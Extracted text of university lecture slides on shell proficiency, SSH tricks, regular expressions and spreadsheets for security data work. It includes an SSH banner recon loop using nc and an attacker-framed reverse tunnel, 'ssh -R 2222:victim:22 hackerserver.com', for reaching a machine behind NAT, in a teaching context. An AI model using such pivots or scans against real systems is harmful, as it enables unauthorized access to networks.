06 Shell
06 Shell
Fall 2024
Shell Proficiency and Data Manipulation
Tyler Bletsch
Duke University
Motivation
• Everyone needs to manipulate data!
• Attackers need to:
▪ Scan target environment for assets
▪ Catalog and search target assets for possible vulnerabilities
▪ Inspect binaries for specific instruction patterns
▪ Extract specific data for processing by other tools (e.g. extracting password
hashes from a user database)
• Defenders need to:
▪ Scan own environment for assets and malicious entities
▪ Catalog own inventory and compare against known vulnerabilities
▪ Inspect traffic and data for known attack signatures
▪ Extract specific data for processing by other tools (e.g. summarizing login
failures to update a firewall blacklist)
2
Fundamental approach: UNIX Philosophy
• Combine simple tools to get complex effects
• Each tool does one thing and does it well
• Basic format of information is always a byte stream and usually text
• Core ingredients:
▪ Shell (e.g. bash)
▪ Pipes and IO redirection
▪ A selection of standard tools
• Bonus ingredients:
▪ SSH trickery
▪ Regular expressions (HUGE!)
▪ Terminal magic (color and cursor control)
▪ Spreadsheet integration
▪ More...
3
The bash shell and common Unix tools
4
The bash shell
• Shell: Most modern Linux systems use bash by default, others exist
▪ We’ll use bash in our examples
1 Okay, I wanted to remain objective, but I had to use PowerShell recently, and I haven’t seen a more deranged shell interface in my life, and that includes MS-DOS from the 1980s. It’s so verbose! Commands equivalent to bash are more than
twice as long. The default output format to files is UTF-16 Little Endian, a format that absolutely no sane piece of software expects to consume by default. Worse, if you look up and memorize the foot-long incantation to make it UTF-8, it insists
on writing a Byte Order Marker (BOM) as the first two bytes of every file, which makes most normal programs even choke on that. So what are you left with? You can ask it to write ASCII, which works, but why are we having to fall back to a
1960s character standard? The most galling part is that UTF-8 doesn’t even need a byte order marker, because you can encode multi-byte characters using UTF-8 expansion codes. It’s insane. Don’t even get me started on what it takes to
redirect a bare list of files to a file (something ls can do by default). Ugh. What is wrong with Microsoft? The entire rest of the planet gets along fine with UNIX-derived shells, but they had to reinvent the wheel, intentionally and snobbishly
ignoring 100% of what came before. Well guess what you get when you do that? Weird garbage. Sorry if you like it. I mean, cool for you I guess? 5
Shell basics review
• Standard IO: stdin, stdout, stderr
• Pipes: direct stdout of one to stdin of another
ls | sort -r # sort files reverse order
6
Stuff from Homework 0 that I assume you know
• echo
• cat
• head
• tail
• less
• grep
• diff
• wc
• sort
Note: The guy who did the Lynda video,
• find Scott Simpson, has more videos. See
Learning Bash Scripting for examples of
some of the stuff in this lecture.
7
Bash syntax
• Expansions:
▪ Tilde (~) is replaced by your home directory (try “echo ~”).
~frank expands to frank’s home directory.
▪ Braces expand a set of options: {a,b}{01..03} expands into 6 arguments:
a01 a02 a03 b01 b02 b03
▪ Wildcards: ? matches one char in a filename, * matches many chars,
[qwe0-3] matches just the chars q, w, e, 0, 1, 2, or 3.
• Non-trivial uses! Find all Makefiles two dirs lower: */*/Makefile
▪ Variables are set with NAME=VALUE. Values are retrieved with $NAME.
Names usually uppercase. Fancy expansions exist, e.g. ${FILENAME%.*} will get
filename extension; see here for info. Variables can be made into environment
variables with export, e.g. export NAME=VALUE.
• Quotes:
▪ By default, each space-delimited token is a separate argument
(different argv[] elements)
▪ To include whitespace in a single argument, quote it.
• Use single quotes to disable ALL expansion listed above: '|{ool'
• Use double quotes to allow variable expansion only: "$NAME is |{ool"
• Or backslash to escape a single character: \$1.21 8
Bash syntax (2)
• Control and subshells
for NAME in WORDS... ; do COMMANDS; done
• Execute commands for each member in a list.
`COMMAND` or $(COMMAND)
• Evaluate to the stdout of COMMAND, e.g.:
USERNAME=`whoami`
9
Control flow examples
• Keep pinging a server called ‘peridot’ and echo a message if it fails
to ping.
while ping -c 1 peridot > /dev/null ; do sleep 1 ;
done ; echo "Server is down!"
(Can invert by prepending ‘!’ to ping – waits for server to come up instead)
• Check to see if our servers have been assigned IPs in DNS:
for A in esa{00..06}.egr.duke.edu ; do host $A ; done
esa00.egr.duke.edu has address 10.148.54.3
esa01.egr.duke.edu has address 10.148.54.20
esa02.egr.duke.edu has address 10.148.54.27
esa03.egr.duke.edu has address 10.148.54.28
esa04.egr.duke.edu has address 10.148.54.29
esa05.egr.duke.edu has address 10.236.67.31
esa05.egr.duke.edu has address 10.148.54.30
esa06.egr.duke.edu has address 10.148.54.31
$ ls -l kit.tgz
-rw-r--r-- 1 tkb13 tkb13 771264 Sep 14 18:14 kit.tgz
13
Examples (2)
• Script to run the ECE650 “hot potato” project for grading:
#!/bin/bash
./ringmaster 51015 40 100 |& tee out-14-rm.log &
./player `hostname` 51015 |& tee out-14-p00.log &
./player `hostname` 51015 |& tee out-14-p01.log &
./player `hostname` 51015 |& tee out-14-p02.log &
…
./player `hostname` 51015 |& tee out-14-p07.log &
./player `hostname` 51015 |& tee out-14-p08.log &
./player `hostname` 51015 |& tee out-14-p09.log &
wait
Backticks to get external hostname Backgrounded
Pause until all child processes have exited. Shorthand for “stdout and stderr together”
14
More common commands (1)
• diff: Compare two files
▪ Example use: How does this config file differ from the known-good backup?
$ diff config config-backup
2d1 Second line, first column
16
More common commands (3)
• file: Identify what kind of file you have by its format
• Example use: Attacker pulled down an opaque file, what is it?
$ file hax.dat
hax.dat: gzip compressed data, last modified: Thu Aug 9 16:50:37 2018, from Unix
$ gzip -cd hax.dat | file - Most programs that take a filename can take ‘-’ to mean stdin.
17
Examples (1)
It’s like echo, but it’s printf.
• Quick SSH banner recon:
$ for H in `cat hostlist` ; do printf "%-30s" "$H" ; echo hi | nc $H 22 | head
-n1 ; done
remote.eos.ncsu.edu SSH-2.0-OpenSSH_7.4
x.dsss.be SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
dsss.be SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10
reliant.colab.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
davros.egr.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
esa00.egr.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
esa01.egr.duke.edu SSH-2.0-OpenSSH_7.6p1 Ubuntu-4
storemaster.egr.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
18
Examples (2)
• Download all the course notes (well, all linked PDFs):
$ wget -r -l1 -A pdf http://people.duke.edu/~tkb13/courses/ece560/
$ find Default behavior prints everything below here in the directory tree – a quick way to check what we got.
.
./people.duke.edu
./people.duke.edu/~tkb13
./people.duke.edu/~tkb13/courses
./people.duke.edu/~tkb13/courses/ece560
./people.duke.edu/~tkb13/courses/ece560/slides
./people.duke.edu/~tkb13/courses/ece560/slides/01-intro.pdf
./people.duke.edu/~tkb13/courses/ece560/slides/02-overview.pdf
./people.duke.edu/~tkb13/courses/ece560/slides/03-networking.pdf
./people.duke.edu/~tkb13/courses/ece560/slides/04-crypto.pdf
./people.duke.edu/~tkb13/courses/ece560/resources
./people.duke.edu/~tkb13/courses/ece560/resources/appx
./people.duke.edu/~tkb13/courses/ece560/resources/appx/C-Standards.pdf
./people.duke.edu/~tkb13/courses/ece560/resources/appx/F-TCP-IP.pdf
./people.duke.edu/~tkb13/courses/ece560/resources/appx/I-DomainNameSystem.pdf
./people.duke.edu/~tkb13/courses/ece560/homework
./people.duke.edu/~tkb13/courses/ece560/homework/homework0.pdf
./people.duke.edu/~tkb13/courses/ece560/homework/Ethics Pledge.pdf
19
Examples (3)
Search a big directory tree for a file in old dBase format
• Using find’s -exec option:
$ find -exec file '{}' ';' | grep -i dbase
./server01-back/dat/cust20150501/dbase_03.dbf: FoxBase+/dBase III DBF, 14 records * 590,
update-date 05-7-13, at offset 1025 1st record "0507121 CMP circular 12“
-exec will run a command for each file found, with {} as the filename, terminating the command with ‘;’.
• Using xargs with null delimiters to deal with filenames with spaces:
$ find -print0 | xargs -0 file | grep -i dbase
./server01-back/dat/cust20150501/spacey filename.dbf: FoxBase+/dBase III DBF, 14 records *
590, update-date 05-7-13, at offset 1025 1st record "0507121 CMP circular 12“
Both find’s output and xargs’s input are set to null-delimited instead of whitespace delimited.
20
Advanced uses of SSH
21
Advanced SSH: Tunnels
• Secure Shell (SSH): We know it logs you into stuff and is encrypted.
It does WAY MORE.
• SSH tunnels: Direct TCP traffic through the SSH connection
▪ ssh -L <bindport>:<farhost>:<farport> <server>
• Local forward: Opens port bindport on the local machine; any
connection to it will tunnel through the SSH connection and cause
server to connect to farhost on farport.
▪ ssh -R <bindport>:<nearhost>:<nearport> <server>
• Remote forward: Opens port bindport on server; any connection to
it will tunnel back through the SSH connection and the local machine will
connect to nearhost on nearport.
▪ ssh -D <bindport> <server>
• Dynamic proxy: Opens port bindport on the local machine. This port
acts as a SOCKS proxy (a protocol allowing clients to open TCP
connections to arbitrary hosts/ports); the proxy will exit on the server
side. Browsers and other apps support SOCKS proxy protocol.
• Easy way to punch into or out of a restricted network environment. 22
Advanced SSH: Tunnel examples
• Example local forward:
▪ You want to connect to an app over the network, but it doesn’t support encryption
and/or you don’t trust its security.
▪ Solution:
• Set app daemon to only listen on loopback connections (127.0.0.1) port 8888
• SSH to server with local forward enabled:
ssh -L 8888:localhost:8888 myserver.com
• Connect your client to localhost:8888 instead of myserver.com:8888.
All traffic is tunneled through encryption; access requires SSH creds.
• Example remote forward:
▪ You’re an attacker with SSH credentials to a machine behind a NAT. You have an
exploit that lets you run a command on another machine behind the NAT.
▪ Solution: SSH to a server you control with a reverse SSH forwarder:
ssh -R 2222:victim:22 hackerserver.com
• Can then connect to hackerserver.com’s loopback port 2222 to get to victim.
• Example dynamic proxy: Turn it on. Set browser to use it. Surf via server.
▪ Bypass censorship, do web-admin on a restricted network, tunnel through a NAT, etc.
23
Advanced SSH: Keys
• You’re used to using passwords to login. That’s...decent.
24
Advanced SSH: Key generation
• Create key pair:
$ ssh-keygen (can provide various options, but default are ok)
Generating public/private rsa key pair.
Enter file in which to save the key (/home/tkbletsc/.ssh/id_rsa): mykey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in mykey.
Your public key has been saved in mykey.pub.
The key fingerprint is:
SHA256:kywUn3nyI+LHOnsOYND5+FY7qIaTS+Ta0bXVjGTVY3Y tkbletsc@FREEMAN
The key's randomart image is:
+---[RSA 2048]----+
| . .. |
| . . o + = E |
| . o . B .o o |
| . + + O |
| . + = S = |
| o o = O + . |
| +o. B = |
| ++..o.+.. |
|. o+. o=. |
+----[SHA256]-----+
25
Advanced SSH: Key files
• Examining the keys:
$ cat mykey
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAq6vZKqVSLfZoiXd6yEgu3ZdLO/gv8mBaepWvJbISe5YKQw63
dBqnLAZc0rJcoqzHgwBjddWUyzDh7g7+MZYgf+n+xE+3QDchqdrktPxj96TMfWUZ
tH1tpY1UNdbIStAhMbGr/L6aKFs/Ouk5RhWw+GPA7N1diATD0SYibTqdG5+JQqGn
...
/4zTb3GDiXFIY9+raaFZ1XLJKBzfhi3ED4ga3nqmeKK60CDTvx8QbA==
-----END RSA PRIVATE KEY-----
$ cat mykey.pub
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQCrq9kqpVIt9miJd3rISC7dl0s7+C/yYFp6la8l
shJ7lgpDDrd0GqcsBlzSslyirMeDAGN11ZTLMOHuDv4xliB/6fuJK0D4BCFbhD8Y2eGh
TZ/l/g9uIwIv7merL+UQduCSKvqLo1X4JYsI5VSkNKCjcLo7lJoCOUazqmttkX2EBSGd
3VYp97Eu3XC3rqDAa/FnUe3E4w8nHLk9mB6/qbyr tkbletsc@FREEMAN
26
Advanced SSH: Key usage
• Authorizing a key:
▪ Copy only mykey.pub to the remote machine you want to establish access to
▪ On remote machine, add it to ~/.ssh/authorized_keys:
$ cat mykey.pub >> ~/.ssh/authorized_keys
27
Advanced SSH: Commands
• Can give a command with ssh to only do that command (no
interactive session). Stdin/stdout/stderr are tunneled appropriately!
▪ Really works great with passwordless keys!
28
Advanced SSH: SCP, SFTP, and Rsync
• Almost any SSH server is also a file server using the SFTP protocol.
The scp command is one way to use this.
▪ Copy a file to remote home directory:
$ scp file1.txt username@myserver:
▪ Copy a directory to remote server’s web root:
$ scp -r dir1/ webadmin@myserver:/var/www/
• Can also use a tool called rsync to copy only changes to files
▪ Here’s the script I use to update the course site:
echo COLLECTING COURSE SITES
rsync -a --delete-delay ./ECE560/website/
./www/courses/ece560/
rsync -a --delete-delay ./ECE250/website/
./www/courses/ece250/
30
Brief terminal history
• Original terminal: the teletype machine
▪ Based on typewriter technology
▪ It’s why we say “carriage return” and “line feed”
• Then came: the serial terminal
▪ CRT display with basic logic to speak serial protocol
▪ Many hooked up to one mainframe
▪ Needed new codes to do new things like
“clear screen” and “underline” without breaking
compatibility
• Now we have: terminal emulators like xterm
▪ Even more codes to do color, cursor movement, non-
scrolling regions, etc.
32
Terminal control sequences: Color!
33
Why bother?
• Making output visually distinctive can greatly accelerate a task!
• Tester for ECE650 root kit: which would you rather use?
34
Simple example – make errors obvious
for testnum in {0..15} ; do
if ./dotest $testnum ; then
echo "test $testnum: ok"
else
echo -e "\e[41mtest $testnum: FAIL!\e[m"
fi
done
35
Also you can do cool crap
36
Scripting languages and
regular expressions
Regular expression material is adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by
Charles Severance at Univ. Michigan and “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
37
Higher-level scripting languages
• Key languages categories commonly used:
▪ Application: Java, C#, maybe C++
▪ Systems programming: C, maybe Rust
▪ Shell: bash (or ksh, tcsh, etc.)
▪ Scripting: Python, Perl, or Ruby
• You can do everything in bash, but it gets ugly. Things bash is
awkward at:
▪ Math
▪ Arrays
▪ Hash/dictionary data structures
▪ Really any data structures...
• Turn to scripting languages: dynamic, interpreted, compact
38
Scripting language key insight:
three fundamental types
• Most data manipulation tasks can be phrased as simple algorithms
against these three types:
▪ Scalar: simple value, numeric or string
▪ Array: list of values (can nest)
▪ Hash/dictionary/map: relationship between keys and values (can nest)
my %pairs = ( "hello" => 13,
"world" => 31,
"!" => 71 );
foreach my $key ( keys %pairs ) {
print "key = $key, value = $pairs{$key}\n";
}
▪ Idea: Go until you see two slashes in a row, then capture until you find a slash
▪ Problem: can have more than two slashes at start
▪ Idea: Go until you see two or more slashes in a row, then capture until you
find a slash
▪ Problem: What about username specifier (user@) and port number (:80)?
43
Regular Expressions
• Regular expressions are expressive rules for walking a string
▪ May capture parts of the string (parsing) or modify it (substitution)
▪ Like a fancy find-and-replace
44
Understanding Regular Expressions
• Very powerful, cryptic, and fun
• Regular expressions are a language:
▪ Based on "marker characters" - programming with characters
• We’ll use both Perl and Python examples – easy to port to others
45
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
Introduction to Regular Expressions
• Basic syntax
▪ In Perl and sed, RegEx statements begin and end with /
(This is language syntax, not the case for Python and others)
• /something/
▪ Escaping reserved characters is crucial
• /(i.e. / is invalid because ( must be closed
• However, /\(i\.e\. / is valid for finding ‘(i.e. ’
• Reserved characters include:
. * ? + ( ) [ ] { } / \ |
▪ Also some characters have special meanings based on their position
in the statement
46
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Matching
• Text Matching
• A RegEx can match plain text
• ex. if ($name =~ /Dan/) { print “match”; }
• But this will match Dan, Danny, McDaniel, etc…
• Full Text Matching with Anchors
• Might want to match a whole line (or string)
• ex. if ($name =~ /^Dan$/) { print “match”; }
• This will only match Dan
• ^ anchors to the front of the line
• $ anchors to the end of the line
47
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
In Python: The Regular Expression Module
• Before you can use regular expressions in your program, you must
import the library using "import re"
• Use re.search() to see if a string matches a regex
• Use re.findall() extract parts of a string that match your regex
• Use re.sub() to replace a regex match with another string
• Use re.split() to separate a string by a regex separator
• Example:
• if re.search(r'Dan', name): print "match"
In Python, r-quotes mean “raw string”, i.e. “don’t interpret escapes in this string”,
which makes it convenient to write Regexes which use all sorts of weird punctuation
48
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
General operation
• Engine searches string from the beginning
▪ Plain text is treated literally
▪ Special characters allow more flexible matching
49
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Char Classes
• Allows specification of only certain allowable chars
• [dofZ] matches only the letters d, o, f, and Z
• If you have a string ‘dog’ then /[dofZ]/ would match ‘d’ only even
though ‘o’ is also in the class
• So this expression can be stated “match one of either d, o, f, or Z.”
• [A-Za-z] matches any letter
• [a-fA-F0-9] matches any hexadecimal character
• [^*$/\\] matches anything BUT *, $, /, or \
• The ^ in the front of the char class specifies ‘not’
• In a char class, you only need to escape: \ ( ] - ^
50
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Char Classes
• Special character classes match specific characters
• \d matches a single digit
• \w matches a word character: [A-Za-z0-9_]
• \b matches a word boundary,
e.g. /\bword\b/ catches “my word!” but not “mr. wordly”
• \s matches a whitespace character (space, tab, newline)
• . wildcard matches everything but newlines (can make it include newlines)
• Use very carefully, you could get anything!
51
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Char Classes
• Character Class Examples
• /e\w\w/
• Matches ear, eye, etc
• $thing = ‘1, 2, 3 strikes!’; $thing =~ /\s\d/;
• Matches ‘ 2’
• $thing = ‘1, 2, 3 strikes!’; $thing =~ /[\s\d]/;
• Matches ‘1’
• Not always useful to match single characters
• $phone =~ /\d\d\d-\d\d\d-\d\d\d\d/;
• There’s got to be a better way…
52
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Repetition
• Repetition allows for flexibility
• Range of occurrences
• $weight =~ /\d{2,3}/;
• Matches any two- or three-digit integer
• $name =~ /\w{5,}/;
• Matches any name longer than 5 letters
• if ($SSN =~ /\d{9}/) { print “valid SSN!”; }
• Matches exactly 9 digits
53
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Repetition
• General Quantifiers
• Some more special characters
54
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Repetition
• Greedy vs Non-greedy matching
• Greedy matching gets the longest results possible
• Non-greedy matching gets the shortest possible
• Let’s say $robot = ‘The12thRobotIs2ndInLine’
• $robot =~ /\w*\d+/; (greedy)
• Matches The12thRobotIs2
• Maximizes the length of \w
• $robot =~ /\w*?\d+/; (non-greedy)
• Add a ‘?’ to a repetition to make it non-greedy!
• Matches The12
• Minimizes the length of \w
55
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Repetition
• Greedy vs Non-greedy matching
• Suppose $txt = ‘something is so cool’
• $txt =~ /something/;
• Matches ‘something’
• $txt =~ /so(mething)?/;
• Matches ‘something’ and the second ‘so’
• Parenthesis can be used for grouping (e.g. being modified by ‘?’)
and capture (covered later)
56
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Real Life Examples
• Using what you’ve learned so far, you can…
• Validate an email address (note: regex below is a little oversimplified)
• $email =~ /^[\w\.\-]+@(\w+\.)*(\w+)$/
• Determine if log entry includes an IPv4 address
• /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/
57
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regex101 example
• The IP address example
58
Alternation
• Alternation allows multiple possibilities
• Let $story = ‘He went to get his mother’
$story =~ /^(He|She)\b.*?\b(his|her)\b.*? (mother|father|brother|sister|dog)/;
59
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Grouping for Backreferences
• Backreferences (also known as capture groups)
▪ We want to know what the expression finally ended up matching
• Parenthesis give you backreferences let you see what was matched
• Can be used after the expression has evaluated or even inside the
expression itself!
• Handled differently in different languages
• Numbered from left to right, starting at 1
60
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Grouping for Backreferences
• Perl backreferences
• Used inside the expression
• $txt =~ /\b(\w+)\s+\1\b/
• Finds any duplicated word, must use \1 here (true in most languages)
• Used after the expression
• $class =~ /(.+?)-(\d+)/
• The first word between hyphens is stored in the Perl variable $1 (not \1)
and the number goes in $2. (This part varies between languages)
• print “I am in class $1, section $2”;
• Equivalent Python:
import re
cls = "ECE560-02"
m = re.match(r'(.+?)-(\d+)',cls)
print "I'm in class "+m.group(1)+", section "+m.group(2)
61
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Example: Email Headers
• Here are some email headers.
Date: Sep 15, 2018, 5:15 PM
X-Sieve: CMU Sieve 2.3
X-DSPAM-Result: Innocent
X-DSPAM-Confidence: 0.8475
X-Content-Type-Message-Body: text/plain
• Let’s write a regex to just match just the X- ones:
/X-.*: .*/
62
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
Using Regex101.com to understand this
63
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
Example: Email Headers
Capturing name and value
• We still have these email headers
Date: Sep 15, 2018, 5:15 PM
X-Sieve: CMU Sieve 2.3
X-DSPAM-Result: Innocent
X-DSPAM-Confidence: 0.8475
X-Content-Type-Message-Body: text/plain
• Let’s amend our regex to capture the NAME and VALUE.
/(X-.*): (.*)/
64
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
What if we want to PARSE those headers?
• Parenthesis used for capture of part of a match
65
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
Refining a regex (1)
• What if our content includes some confusing non-headers mixed in?
66
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
Refining a regex (2)
• Make regex more specific so it just matches what we want:
^(X-\S*): (.*)
Must be start of line Non-whitespace characters only
67
Adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by Charles Severance at Univ. Michigan
Grouping without Backreferences
• Sometimes you just need to make a group
▪ If important groups must be backreferenced, disable backreferencing for any
unimportant groups
• $sentence =~ /(?:He|She) likes (\w+)\./;
▪ I don’t care if it’s a he or she
▪ All I want to know is what he/she likes
▪ Therefore I use (?:) to forgo the backreference
▪ Capture group 1 will contain that thing that he/she likes
68
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Matching Modes
• Matching has different functional modes
▪ In Perl, these are specified as letters after the regex.
• $name =~ /[a-z]+/i;
▪ i turns off case sensitivity
• $xml =~ /title=“([\w ]*)”.*keywords=“([\w ]*)”/s;
▪ s enables . to match newlines
• $report =~ /^\s*Name:[\s\S]*?The End.\s*$/m;
▪ m allows newlines between ^ and $
▪ In Python, you pass an additional optional argument with named constants
(either short like the above or with full names), e.g.:
• re.search(r'[a-z]+', name, re.I) # or re.IGNORECASE
69
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Regular Expression Substitution
• Substitutions simplify complex data modification
▪ First part is a regex of what to find, second part is text to replace it
▪ Backreferences can be included in replacement
▪ For sophisticated work, most languages let you give a callback function so
that the replacement can be programmatically generated for each match
• Perl replacement syntax
▪ $phone =~ s/\D//;
• Removes the first non-digit character in a phone number
(Leaving the replacement blank means “replace with nothing”, i.e. “delete”)
▪ $html =~ s/^(\s*)/$1\t/;
• Adds a tab to a line of HTML using backreference $1
• Python uses re.sub()
70
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Substitutions Modes
• Substitutions have modes like matches (ignore case, multiline, etc.)
• Important one: Substitutions can be performed singly or globally
▪ In Perl, use the g flag to force the expression to scan the entire string
• $phone =~ s/\D//g;
▪ Removes all non-digits in the phone number
▪ In Python’s re.sub() function, specify a count parameter to limit
replacements (e.g. count=1 for traditional “first match only” behavior)
71
Adapted from “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Combining one-liners and regexes
• Remember this slide when I compared color output to plain?
▪ less (Press /)
ain’t launching that thing
but you can type “C-M-s”
for regex search
(whatever that means)
Notepad++
emacs
76
Hey, how about Excel? That thing’s cool, right?
• Terminals are nice, but did you know: GUIs exist?
• Some tasks benefit from non-terminal interface
• Example: tabular data wants to be in a spreadsheet
• Let’s cover some quick tips on (ab)using Excel (or Google Sheets)
77
Data in/out
• File format for getting in/out of Excel:
Comma-Separated Values (CSV)
▪ Trivial for simple data: bob,2,19
▪ If you have commas in data, enclose in quotes: "Jimmy, PhD",4,50
▪ If you have quotes, double them up: "This is a ""quote""",7,94
▪ Save with “.csv” extension an Excel loads it right up
▪ Can generate well enough with simple commands
▪ Can use common libraries to do everything “right” (quoting, etc.); e.g. Python
has a built-in csv module
• For fast stuff, can just use the clipboard
▪ Often quick just to copy/paste instead of making actual files
▪ Format for spreadsheet <-> plaintext via clipboard is tab-separated
▪ For a single column of data, there’s no tabs – it’s just in lines!
78
Formulas
• Spreadsheet formulas are outside of our scope – if you aren’t
familiar, you need to learn them
79
Auto-filter
• Take a sheet, make sure it has headers, highlight your data, turn on
auto filter → Bam! instant sort/filter controls.
▪ Example: Requesting badge access for some students.
80
Auto-filter
• Take a sheet, make sure it has headers, highlight your data, turn on
auto filter → Bam! instant sort/filter controls.
▪ Example: Requesting badge access for some students.
81
Auto-filter
• Take a sheet, make sure it has headers, highlight your data, turn on
auto filter → Bam! instant sort/filter controls.
▪ Example: Requesting badge access for some students.
82
Putting it all together
83
Example data manipulation task:
Planning Homework 1
• What I have: The Homework 1 draft writeup
• My goal: Plan out point allocation for questions
• What I want: Table of question number, topic, and points
84
Planning Homework 1:
Acquire source data
• Select all, copy
• In shell, run “cat > q” and paste (middle-click), then Ctrl+D for EOF
85
Planning Homework 1:
Develop regex
Oh, I must need a perl-level regex. Switch to -P
86
Planning Homework 1:
Debug regex
87
Planning Homework 1:
Clean output
89
Example task: Organizing PPTs
Gathering info
• Reviewing ECE651 course content, need to organize slides
• Have syllabus and downloaded content, want to put in order
• Can’t fully automate: matching syllabus to filenames is fuzzy
• Excel can help:
$ ls > x.csv